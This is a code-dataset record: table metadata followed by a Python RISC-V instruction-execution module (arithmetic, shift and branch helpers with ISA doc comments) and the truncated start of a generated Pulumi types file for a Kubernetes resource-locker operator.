hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
269f3899e2caa5d9fcfd6adb5d12dfb80d8ece0b
| 16,294
|
py
|
Python
|
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
import functools
import riscv.constants
def lui(imm):
# Description
# Build 32-bit constants and uses the U-type format. LUI places the
# U-immediate value in the top 20 bits of the destination register
# rd, filling in the lowest 12 bits with zeros.
# Implementation
# x[rd] = sext(immediate[31:12] << 12)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#lui
return riscv.constants.integer_to_list_of_bytes(imm, 64, 'little')
def auipc(pc, imm):
# Description
# Build pc-relative addresses and uses the U-type format. AUIPC forms
# a 32-bit offset from the 20-bit U-immediate, filling in the lowest 12
# bits with zeros, adds this offset to the pc, then places the result
# in register rd.
# Implementation
# x[rd] = pc + sext(immediate[31:12] << 12)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#auipc
return riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little')
def jal(pc, imm, sz):
return (
riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'),
riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'),
) # next_pc, ret_pc
def jalr(pc, imm, rs1, sz):
return (
riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(rs1, 'little'), 64, 'little'),
riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'),
) # next_pc, ret_pc
def addi(rs1, imm):
# Description
# Adds the sign-extended 12-bit immediate to register rs1. Arithmetic
# overflow is ignored and the result is simply the low XLEN bits of the
# result. ADDI rd, rs1, 0 is used to implement the MV rd, rs1 assembler
# pseudo-instruction.
# Implementation
# x[rd] = x[rs1] + sext(immediate)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#addi
return riscv.constants.integer_to_list_of_bytes(
imm + int.from_bytes(rs1, 'little', signed=True),
64,
'little'
)
def slti(rs1, imm):
# Description
# Place the value 1 in register rd if register rs1 is less than the
# signextended immediate when both are treated as signed numbers, else
# 0 is written to rd.
# Implementation
# x[rd] = x[rs1] <s sext(immediate)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#slti
return riscv.constants.integer_to_list_of_bytes((1 if int.from_bytes(rs1, 'little', signed=True) < imm else 0), 64, 'little')
def sltiu(rs1, imm):
# Description
# Place the value 1 in register rd if register rs1 is less than the
# immediate when both are treated as unsigned numbers, else 0 is
# written to rd.
# Implementation
# x[rd] = x[rs1] <u sext(immediate)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#sltiu
return riscv.constants.integer_to_list_of_bytes((1 if int.from_bytes(rs1, 'little') < imm else 0), 64, 'little')
def andi(rs1, imm):
# Description
# Performs bitwise AND on register rs1 and the sign-extended 12-bit
# immediate and place the result in rd
# Implementation
# x[rd] = x[rs1] & sext(immediate)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#andi
return list(map(
lambda a, b: a & b,
rs1,
riscv.constants.integer_to_list_of_bytes(imm, 64, 'little')
))
def add(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1, 'little', signed=True) + int.from_bytes(rs2, 'little', signed=True),
64,
'little',
)
def sub(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1, 'little', signed=True) - int.from_bytes(rs2, 'little', signed=True),
64,
'little',
)
def xor(rs1, rs2):
return list(map(
lambda a, b: a ^ b,
rs1,
rs2,
))
def do_or(rs1, rs2):
return list(map(
lambda a, b: a | b,
rs1,
rs2,
))
def do_and(rs1, rs2):
return list(map(
lambda a, b: a & b,
rs1,
rs2,
))
def mul(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little', signed=True) * int.from_bytes(rs2, 'little', signed=True)) & ((2 ** 64) - 1),
64,
'little',
)
def mulh(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
((int.from_bytes(rs1, 'little', signed=True) * int.from_bytes(rs2, 'little', signed=True)) >> 64) & ((2 ** 64) - 1),
64,
'little',
)
def mulhsu(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
((int.from_bytes(rs1, 'little', signed=True) * int.from_bytes(rs2, 'little')) >> 64) & ((2 ** 64) - 1),
64,
'little',
)
def mulhu(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
((int.from_bytes(rs1, 'little') * int.from_bytes(rs2, 'little')) >> 64) & ((2 ** 64) - 1),
64,
'little',
)
def div(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little', signed=True) // int.from_bytes(rs2, 'little', signed=True)) & ((2 ** 64) - 1),
64,
'little',
)
def divu(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little') // int.from_bytes(rs2, 'little')) & ((2 ** 64) - 1),
64,
'little',
)
def rem(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little', signed=True) % int.from_bytes(rs2, 'little', signed=True)) & ((2 ** 64) - 1),
64,
'little',
)
def remu(rs1, rs2):
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little') % int.from_bytes(rs2, 'little')) & ((2 ** 64) - 1),
64,
'little',
)
def slli(rs1, shamt):
# Description
# Performs logical left shift on the value in register rs1 by the shift
# amount held in the lower 5 bits of the immediate
# In RV64, bit-25 is used to shamt[5].
# Implementation
# x[rd] = x[rs1] << shamt
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#slli
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little') << shamt) & ((2**64) - 1),
64,
'little',
)
def srli(rs1, shamt):
# Description
# Performs logical right shift on the value in register rs1 by the shift
# amount held in the lower 5 bits of the immediate
# In RV64, bit-25 is used to shamt[5].
# Implementation
# x[rd] = x[rs1] >>u shamt
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#srli
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1, 'little') >> shamt,
64,
'little',
)
def srai(rs1, shamt):
# Description
# Performs arithmetic right shift on the value in register rs1 by the
# shift amount held in the lower 5 bits of the immediate
# In RV64, bit-25 is used to shamt[5].
# Implementation
# x[rd] = x[rs1] >>s shamt
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#srai
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1, 'little', signed=True) >> shamt,
64,
'little',
)
def addiw(rs1, imm):
# Description
# Adds the sign-extended 12-bit immediate to register rs1 and produces
# the proper sign-extension of a 32-bit result in rd. Overflows are
# ignored and the result is the low 32 bits of the result sign-extended
# to 64 bits. Note, ADDIW rd, rs1, 0 writes the sign-extension of the
# lower 32 bits of register rs1 into register rd (assembler
# pseudoinstruction SEXT.W).
# Implementation
# x[rd] = sext((x[rs1] + sext(immediate))[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#addiw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((imm + int.from_bytes(rs1, 'little')) & ((2**32) - 1)).to_bytes(4, 'little'), 'little', signed=True),
64,
'little'
)
def slliw(rs1, shamt):
# Description
# Performs logical left shift on the 32-bit of value in register rs1
# by the shift amount held in the lower 5 bits of the immediate.
# Encodings with $imm[5] neq 0$ are reserved.
# Implementation
# x[rd] = sext((x[rs1] << shamt)[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#slliw
return riscv.constants.integer_to_list_of_bytes(
(int.from_bytes(rs1, 'little') << shamt) & ((2**32) - 1),
64,
'little',
)
def srliw(rs1, shamt):
# Description
# Performs logical right shift on the 32-bit of value in register rs1
# by the shift amount held in the lower 5 bits of the immediate.
# Encodings with $imm[5] neq 0$ are reserved.
# Implementation
# x[rd] = sext(x[rs1][31:0] >>u shamt)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#srliw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1[:4], 'little') >> shamt,
64,
'little',
)
def sraiw(rs1, shamt):
# Description
# Performs arithmetic right shift on the 32-bit of value in register
# rs1 by the shift amount held in the lower 5 bits of the immediate.
# Encodings with $imm[5] neq 0$ are reserved.
# Implementation
# x[rd] = sext(x[rs1][31:0] >>s shamt)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#sraiw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(rs1[:4], 'little', signed=True) >> shamt,
64,
'little',
)
def addw(rs1, rs2):
# Description
# Adds the 32-bit of registers rs1 and 32-bit of register rs2 and
# stores the result in rd. Arithmetic overflow is ignored and the low
# 32-bits of the result is sign-extended to 64-bits and written to the
# destination register.
# Implementation
# x[rd] = sext((x[rs1] + x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#addw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little', signed=True) + int.from_bytes(rs2, 'little', signed=True)) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def subw(rs1, rs2):
# Description
# Subtract the 32-bit of registers rs1 and 32-bit of register rs2 and
# stores the result in rd. Arithmetic overflow is ignored and the low
# 32-bits of the result is sign-extended to 64-bits and written to the
# destination register.
# Implementation
# x[rd] = sext((x[rs1] - x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#subw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little', signed=True) - int.from_bytes(rs2, 'little', signed=True)) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def mulw(rs1, rs2):
# Implementation
# x[rd] = sext((x[rs1] × x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little', signed=True) * int.from_bytes(rs2, 'little', signed=True)) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def divw(rs1, rs2):
# Implementation
# x[rd] = sext((x[rs1] /s x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little', signed=True) // int.from_bytes(rs2, 'little', signed=True)) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def divuw(rs1, rs2):
# Implementation
# x[rd] = sext((x[rs1] /s x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little') // int.from_bytes(rs2, 'little')) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def remw(rs1, rs2):
# Implementation
# x[rd] = sext((x[rs1] /s x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little', signed=True) % int.from_bytes(rs2, 'little', signed=True)) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def remuw(rs1, rs2):
# Implementation
# x[rd] = sext((x[rs1] /s x[rs2])[31:0])
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
return riscv.constants.integer_to_list_of_bytes(
int.from_bytes(((int.from_bytes(rs1, 'little') % int.from_bytes(rs2, 'little')) & ((2**64) - 1)).to_bytes(8, 'little')[:4], 'little', signed=True),
64,
'little',
)
def beq(pc, rs1, rs2, imm, sz):
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if all(map(lambda a, b: a == b, rs1, rs2)) else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
def bne(pc, rs1, rs2, imm, sz):
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if not all(map(lambda a, b: a == b, rs1, rs2)) else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
def blt(pc, rs1, rs2, imm, sz):
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if int.from_bytes(rs1, 'little', signed=True) < int.from_bytes(rs2, 'little', signed=True) else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
def bge(pc, rs1, rs2, imm, sz):
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if int.from_bytes(rs1, 'little', signed=True) >= int.from_bytes(rs2, 'little', signed=True) else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
def bltu(pc, rs1, rs2, imm, sz):
# Description
# Take the branch if registers rs1 is less than rs2, using unsigned
# comparison.
# Implementation
# if (rs1 >u rs2) pc += sext(offset)
# XXX: Umm... The above is a typo, right?!?!?!?!?!?!?
# I copied it verbatim from the Web address below, but it doesn't
# make any sense to do rs1 unsigned-greater-than rs2 if the
# instruction is branch-if-less-than-unsigned. Right?!?!?!?!?!?!?
# I'm going to act as though it said the implementation were
# if (rs1 <u rs2) pc += sext(offset)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#bltu
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if int.from_bytes(rs1, 'little') < int.from_bytes(rs2, 'little') else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
def bgeu(pc, rs1, rs2, imm, sz):
# Description
# Take the branch if registers rs1 is greater than rs2, using unsigned
# comparison.
# Implementation
# if (rs1 >=u rs2) pc += sext(offset)
# see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#bgeu
return (
(riscv.constants.integer_to_list_of_bytes(imm + int.from_bytes(pc, 'little'), 64, 'little'), True)
if int.from_bytes(rs1, 'little') >= int.from_bytes(rs2, 'little') else
(riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'), False)
)
| 43.450667
| 182
| 0.636737
| 2,430
| 16,294
| 4.15679
| 0.088066
| 0.053361
| 0.091476
| 0.104742
| 0.877042
| 0.869518
| 0.841699
| 0.830413
| 0.81982
| 0.79507
| 0
| 0.040917
| 0.215539
| 16,294
| 375
| 183
| 43.450667
| 0.749257
| 0.384927
| 0
| 0.495652
| 0
| 0
| 0.079765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.178261
| false
| 0
| 0.008696
| 0.178261
| 0.365217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
26cc35bb995813072d7eed65391dae37af7d66d8
| 37,283
|
py
|
Python
|
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | null | null | null |
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | 2
|
2020-09-18T17:12:23.000Z
|
2020-12-30T19:40:56.000Z
|
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'ResourceLockerSpec',
'ResourceLockerSpecPatches',
'ResourceLockerSpecPatchesSourceObjectRefs',
'ResourceLockerSpecPatchesTargetObjectRef',
'ResourceLockerSpecResources',
'ResourceLockerSpecServiceAccountRef',
'ResourceLockerStatus',
'ResourceLockerStatusConditions',
'ResourceLockerStatusLockedPatchStatuses',
'ResourceLockerStatusLockedResourceStatuses',
]
@pulumi.output_type
class ResourceLockerSpec(dict):
"""
ResourceLockerSpec defines the desired state of ResourceLocker
"""
def __init__(__self__, *,
patches: Optional[Sequence['outputs.ResourceLockerSpecPatches']] = None,
resources: Optional[Sequence['outputs.ResourceLockerSpecResources']] = None,
service_account_ref: Optional['outputs.ResourceLockerSpecServiceAccountRef'] = None):
"""
ResourceLockerSpec defines the desired state of ResourceLocker
:param Sequence['ResourceLockerSpecPatchesArgs'] patches: Patches is a list of patches that should be enforced at runtime.
:param Sequence['ResourceLockerSpecResourcesArgs'] resources: Resources is a list of resource manifests that should be locked into the specified configuration
:param 'ResourceLockerSpecServiceAccountRefArgs' service_account_ref: ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
"""
if patches is not None:
pulumi.set(__self__, "patches", patches)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if service_account_ref is not None:
pulumi.set(__self__, "service_account_ref", service_account_ref)
@property
@pulumi.getter
def patches(self) -> Optional[Sequence['outputs.ResourceLockerSpecPatches']]:
"""
Patches is a list of patches that should be enforced at runtime.
"""
return pulumi.get(self, "patches")
@property
@pulumi.getter
def resources(self) -> Optional[Sequence['outputs.ResourceLockerSpecResources']]:
"""
Resources is a list of resource manifests that should be locked into the specified configuration
"""
return pulumi.get(self, "resources")
@property
@pulumi.getter(name="serviceAccountRef")
def service_account_ref(self) -> Optional['outputs.ResourceLockerSpecServiceAccountRef']:
"""
ServiceAccountRef is the service account to be used to run the controllers associated with this configuration kubebuilder:default:="{Name: "default"}"
"""
return pulumi.get(self, "service_account_ref")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatches(dict):
"""
Patch describe a patch to be enforced at runtime
"""
def __init__(__self__, *,
id: str,
patch_template: str,
target_object_ref: 'outputs.ResourceLockerSpecPatchesTargetObjectRef',
patch_type: Optional[str] = None,
source_object_refs: Optional[Sequence['outputs.ResourceLockerSpecPatchesSourceObjectRefs']] = None):
"""
Patch describe a patch to be enforced at runtime
:param str id: ID represent a unique identifier for the patch in the array of patches oc this CR
:param str patch_template: PatchTemplate is a go template that will be resolved using the SourceObjectRefs as parameters. The result must be a valid patch based on the patch type and the target object.
:param 'ResourceLockerSpecPatchesTargetObjectRefArgs' target_object_ref: TargetObjectRef is a reference to the object to which the patch should be applied.
:param str patch_type: PatchType is the type of patch to be applied, one of "application/json-patch+json"'"application/merge-patch+json","application/strategic-merge-patch+json","application/apply-patch+yaml" kubebuilder:default:="application/strategic-merge-patch+json"
:param Sequence['ResourceLockerSpecPatchesSourceObjectRefsArgs'] source_object_refs: SourceObject refs is an array of references to source objects that will be used as input for the template processing
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "patch_template", patch_template)
pulumi.set(__self__, "target_object_ref", target_object_ref)
if patch_type is not None:
pulumi.set(__self__, "patch_type", patch_type)
if source_object_refs is not None:
pulumi.set(__self__, "source_object_refs", source_object_refs)
@property
@pulumi.getter
def id(self) -> str:
"""
ID represent a unique identifier for the patch in the array of patches oc this CR
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="patchTemplate")
def patch_template(self) -> str:
"""
PatchTemplate is a go template that will be resolved using the SourceObjectRefs as parameters. The result must be a valid patch based on the patch type and the target object.
"""
return pulumi.get(self, "patch_template")
@property
@pulumi.getter(name="targetObjectRef")
def target_object_ref(self) -> 'outputs.ResourceLockerSpecPatchesTargetObjectRef':
"""
TargetObjectRef is a reference to the object to which the patch should be applied.
"""
return pulumi.get(self, "target_object_ref")
@property
@pulumi.getter(name="patchType")
def patch_type(self) -> Optional[str]:
"""
PatchType is the type of patch to be applied, one of "application/json-patch+json"'"application/merge-patch+json","application/strategic-merge-patch+json","application/apply-patch+yaml" kubebuilder:default:="application/strategic-merge-patch+json"
"""
return pulumi.get(self, "patch_type")
@property
@pulumi.getter(name="sourceObjectRefs")
def source_object_refs(self) -> Optional[Sequence['outputs.ResourceLockerSpecPatchesSourceObjectRefs']]:
"""
SourceObject refs is an array of references to source objects that will be used as input for the template processing
"""
return pulumi.get(self, "source_object_refs")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ResourceLockerSpecPatchesSourceObjectRefs(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
